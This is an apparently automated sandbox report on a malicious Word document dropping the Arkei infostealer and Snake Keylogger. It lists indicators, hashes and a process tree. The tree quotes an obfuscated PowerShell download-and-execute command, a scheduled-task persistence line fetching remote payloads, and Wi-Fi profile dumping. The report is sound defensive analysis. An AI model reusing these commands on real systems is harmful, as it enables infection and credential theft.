arkei | 0d3613b7a4aec3b9ad6f0fc308bdf7da98a4574e6cae6ab91a8c0ea4857f1fbc

Analysis

max time kernel
11s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
24-05-2022 08:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEW ORDER.docx
Size

183KB
MD5

e3269bf05703bb2d4e7cfcceca146ed5
SHA1

e5e2a9a4c2dca94eb93669ef73219cfc7754a260
SHA256

0d3613b7a4aec3b9ad6f0fc308bdf7da98a4574e6cae6ab91a8c0ea4857f1fbc
SHA512

acd7810464891ad926e63b579b6b09bb569397b5f8edbbbce4c9d2407cfe2d9a807d5f2a314cf592ff489a14773ee206e9029b077953503b58ba8d22586c8f15

Score

10^/10

arkei snakekeylogger default keylogger stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.mediafire.com/file/jjqt737nagc8wqp/1.dll/file

Extracted

Family

arkei

Botnet

Default

Signatures

Arkei
Arkei is an infostealer written in C++.
stealer arkei

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	1604	4192	WSCRIPT.exe	81

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger Payload 3 IoCs

resource	yara_rule
behavioral2/memory/2836-177-0x00000000004771BE-mapping.dmp	family_snakekeylogger
behavioral2/memory/2192-175-0x00000000004771BE-mapping.dmp	family_snakekeylogger
behavioral2/memory/2192-174-0x0000000000400000-0x000000000047C000-memory.dmp	family_snakekeylogger

Executes dropped EXE 1 IoCs

pid	Process
2960	ddond.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
45	checkip.dyndns.org

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4900	4428	WerFault.exe	96

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1204	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
220	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Kills process with taskkill 3 IoCs

evasion

pid	Process
5048	taskkill.exe
2404	taskkill.exe
3372	taskkill.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	ddond.com
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	ddond.com

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
3704	WINWORD.EXE
3704	WINWORD.EXE

Suspicious use of SetWindowsHookEx 13 IoCs

pid	Process
3704	WINWORD.EXE
3704	WINWORD.EXE
3704	WINWORD.EXE
3704	WINWORD.EXE
3704	WINWORD.EXE
3704	WINWORD.EXE
4192	EXCEL.EXE
4192	EXCEL.EXE
4192	EXCEL.EXE
4192	EXCEL.EXE
4192	EXCEL.EXE
4192	EXCEL.EXE
4192	EXCEL.EXE

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 3704 wrote to memory of 1696	3704	WINWORD.EXE	80
PID 3704 wrote to memory of 1696	3704	WINWORD.EXE	80
PID 4192 wrote to memory of 1604	4192	EXCEL.EXE	82
PID 4192 wrote to memory of 1604	4192	EXCEL.EXE	82

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\NEW ORDER.docx" /o ""
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3704
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:1696

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4192
- C:\Windows\SYSTEM32\WSCRIPT.exe
  WSCRIPT C:\Users\Public\update.js
  2⤵
  - Process spawned unexpected child process
  PID:1604

C:\ProgramData\ddond.com
C:\ProgramData\ddond.com https://www.mediafire.com/file/frjrn9astpfr2ua/1.htm/file
1⤵
- Executes dropped EXE
- Modifies system certificate store
PID:2960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $MMMMMMM=((n`e`W`-Obj`E`c`T (('Net'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'.'+'W'+'eb'+'c'+''+''+''+''+''+''+''+''+''+'lient'))).(('D'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'o'+'w'+'n'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).invoke((('https://www.mediafire.com/file/jjqt737nagc8wqp/1.dll/file'))));Invoke-Expression $MMMMMMM
  2⤵
  PID:3568
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1fjf2a1s\1fjf2a1s.cmdline"
    3⤵
    PID:4896
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9520.tmp" "c:\Users\Admin\AppData\Local\Temp\1fjf2a1s\CSCD7D14951435641FE8C3F2CCBB4B0B9D5.TMP"
      4⤵
      PID:3228
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
    3⤵
    PID:4428
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 1284
      4⤵
      Program crash
      PID:4900
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
    3⤵
    PID:4352
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
    3⤵
    PID:4364
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe" & exit
      4⤵
      PID:3544
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
    3⤵
    PID:3812
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
    3⤵
    PID:2836
  - - C:\Windows\SysWOW64\netsh.exe
      "netsh" wlan show profile
      4⤵
      PID:2540
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
    3⤵
    PID:2192
  - - C:\Windows\SysWOW64\netsh.exe
      "netsh" wlan show profile
      4⤵
      PID:1912
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
    3⤵
    PID:3028
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 83 /tn calsaasdendersw /F /tr """C:\ProgramData\milon.com""""""https://www.mediafire.com/file/3cv72x1byy9pj9q/1.htm/file"""
  2⤵
  - Creates scheduled task(s)
  PID:1204
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /f /im WinWord.exe
  2⤵
  - Kills process with taskkill
  PID:3372
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
  2⤵
  - Kills process with taskkill
  PID:5048
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /f /im POWERPNT.exe
  2⤵
  - Kills process with taskkill
  PID:2404

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4428 -ip 4428
1⤵
PID:3704

C:\Windows\SysWOW64\timeout.exe
timeout /t 5
1⤵
- Delays execution with timeout.exe
PID:220

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ddond.com

Filesize
14KB

MD5
0b4340ed812dc82ce636c00fa5c9bef2

SHA1
51c97ebe601ef079b16bcd87af827b0be5283d96

SHA256
dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

SHA512
d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

Download Submit
C:\ProgramData\ddond.com

Filesize
14KB

MD5
0b4340ed812dc82ce636c00fa5c9bef2

SHA1
51c97ebe601ef079b16bcd87af827b0be5283d96

SHA256
dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895

SHA512
d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

Download Submit
C:\ProgramData\freebl3.dll

Filesize
326KB

MD5
ef2834ac4ee7d6724f255beaf527e635

SHA1
5be8c1e73a21b49f353c2ecfa4108e43a883cb7b

SHA256
a770ecba3b08bbabd0a567fc978e50615f8b346709f8eb3cfacf3faab24090ba

SHA512
c6ea0e4347cbd7ef5e80ae8c0afdca20ea23ac2bdd963361dfaf562a9aed58dcbc43f89dd826692a064d76c3f4b3e92361af7b79a6d16a75d9951591ae3544d2

Download Submit
C:\ProgramData\mozglue.dll

Filesize
133KB

MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
C:\ProgramData\mozglue.dll

Filesize
133KB

MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
C:\ProgramData\mozglue.dll

Filesize
133KB

MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
C:\ProgramData\msvcp140.dll

Filesize
429KB

MD5
109f0f02fd37c84bfc7508d4227d7ed5

SHA1
ef7420141bb15ac334d3964082361a460bfdb975

SHA256
334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

SHA512
46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

Download Submit
C:\ProgramData\nss3.dll

Filesize
1.2MB

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\ProgramData\nss3.dll

Filesize
1.2MB

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\ProgramData\nss3.dll

Filesize
1.2MB

MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\ProgramData\softokn3.dll

Filesize
141KB

MD5
a2ee53de9167bf0d6c019303b7ca84e5

SHA1
2a3c737fa1157e8483815e98b666408a18c0db42

SHA256
43536adef2ddcc811c28d35fa6ce3031029a2424ad393989db36169ff2995083

SHA512
45b56432244f86321fa88fbcca6a0d2a2f7f4e0648c1d7d7b1866adc9daa5eddd9f6bb73662149f279c9ab60930dad1113c8337cb5e6ec9eed5048322f65f7d8

Download Submit
C:\ProgramData\vcruntime140.dll

Filesize
81KB

MD5
7587bf9cb4147022cd5681b015183046

SHA1
f2106306a8f6f0da5afb7fc765cfa0757ad5a628

SHA256
c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

SHA512
0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1fjf2a1s\1fjf2a1s.dll

Filesize
3KB

MD5
26eca3f1fac07476ce49ae4926b0bd2d

SHA1
56b278b5cc158ac753d61826d37d88e3f1830423

SHA256
7bd290f38e7c154a127f67631af9a950e44c6a05333293d79581800c41718073

SHA512
c72f289f8841eada0ed1f96fd8df6bb2c793b68252f9b372ee37b131fb872ffde65a77f12c2413c834c0b2f0f53c6cee647b73b74894677052651007b14b8d3a

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9520.tmp

Filesize
1KB

MD5
f252ad639c778bcd27debfb5a16fcef0

SHA1
3735350cdc0779f6e6fa944a76834d5e7f6ec2f6

SHA256
87f9cb93c22506d841332f640299417bbcc2f763dc13713b990be1fa8a3a5629

SHA512
dd1c8ca770ee725989f87129cfad5752135c86fc59af17e6981c25f53ba06729e5773cffb6dd4bd982d03ef0d546d1f5fb29144ea027b1c17772950ea893f72b

Download Submit
C:\Users\Public\update.js

Filesize
4KB

MD5
85dd8660f73e963b4cc118fcc6c5e0ff

SHA1
dad070232ef6f5f4f2108c14e5aa8edcfb918f19

SHA256
19d041a92459565d69e4b88c6add11f53cedadd34a03136facdaec16937dc9f8

SHA512
1ee1da0b79d08dd33b21e1a85bf315ecaf5b2ddea8bbb251b98bbe08c614f1bb839b5b74afe06beb2ebc11fec4f445c8b38dc9125d333cbcc778017d0998dda6

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1fjf2a1s\1fjf2a1s.0.cs

Filesize
840B

MD5
268033bad46157d9949101dfdbd69f95

SHA1
14a7532c9470d058536ff71251abc55320dee08e

SHA256
17b8a040220f09bb5eeb9530460b8e7ab64eafabef7623dec029158d9f7faf7f

SHA512
09c43d5277e41983127be6fc2b915ff506e461a8847b4bd25446d1b7db63085f59fb5c342771bf730b913aa46150912919190c86960d33d96d4c513163f0068b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1fjf2a1s\1fjf2a1s.cmdline

Filesize
369B

MD5
340a63a2c4d3859c01fc9b0c13c956f5

SHA1
500e23eff88a0a21ec0a6ce1b12cf7dfd72bd053

SHA256
6b6edca9220d51f0f39d9ab59cb228c15e10d048a3cef3cc59a956d2270bda42

SHA512
ff76b8fb50657d4008d34583420bb50c3ca8d060d9032aee96770a88fb8ce17a8f1d74d2b55bd292e2563f1f4f0fdcc3a602dc7643d4e4914a53b3f588bec358

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\1fjf2a1s\CSCD7D14951435641FE8C3F2CCBB4B0B9D5.TMP

Filesize
652B

MD5
92daf7e1d4b4c754b9fe8c862dc51c8e

SHA1
23c1333d40db91c9f5739d42c35583257e9e234f

SHA256
1ef68526599b52ff4378260ab4a7924388ec21903069f56b5e6371a915d3648a

SHA512
a85443c28e043607d62975ccc7a45d5fb5a52e31f3f2ff05a17602a0377547c2315c48dfb3e9749ddbfa68310d3eaf366674b450db7d57621073e649c03c6165

Download Submit
memory/2192-183-0x0000000006B20000-0x0000000006BB2000-memory.dmp

Filesize
584KB

Download
memory/2192-174-0x0000000000400000-0x000000000047C000-memory.dmp

Filesize
496KB

Download
memory/2192-234-0x0000000006ED0000-0x0000000006EDA000-memory.dmp

Filesize
40KB

Download
memory/2192-180-0x00000000057E0000-0x000000000587C000-memory.dmp

Filesize
624KB

Download
memory/2192-179-0x0000000005F10000-0x00000000064B4000-memory.dmp

Filesize
5.6MB

Download
memory/2836-178-0x0000000073EA0000-0x0000000074451000-memory.dmp

Filesize
5.7MB

Download
memory/3568-156-0x00007FFD330B0000-0x00007FFD33B71000-memory.dmp

Filesize
10.8MB

Download
memory/3568-153-0x000002A8CDE90000-0x000002A8CDEB2000-memory.dmp

Filesize
136KB

Download
memory/3704-130-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp

Filesize
64KB

Download
memory/3704-135-0x00007FFD1E400000-0x00007FFD1E410000-memory.dmp

Filesize
64KB

Download
memory/3704-134-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp

Filesize
64KB

Download
memory/3704-133-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp

Filesize
64KB

Download
memory/3704-132-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp

Filesize
64KB

Download
memory/3704-136-0x00007FFD1E400000-0x00007FFD1E410000-memory.dmp

Filesize
64KB

Download
memory/3704-131-0x00007FFD20A90000-0x00007FFD20AA0000-memory.dmp

Filesize
64KB

Download
memory/4364-172-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4428-164-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4428-170-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4428-173-0x0000000000400000-0x000000000043D000-memory.dmp

Filesize
244KB

Download
memory/4428-184-0x0000000060900000-0x0000000060992000-memory.dmp

Filesize
584KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads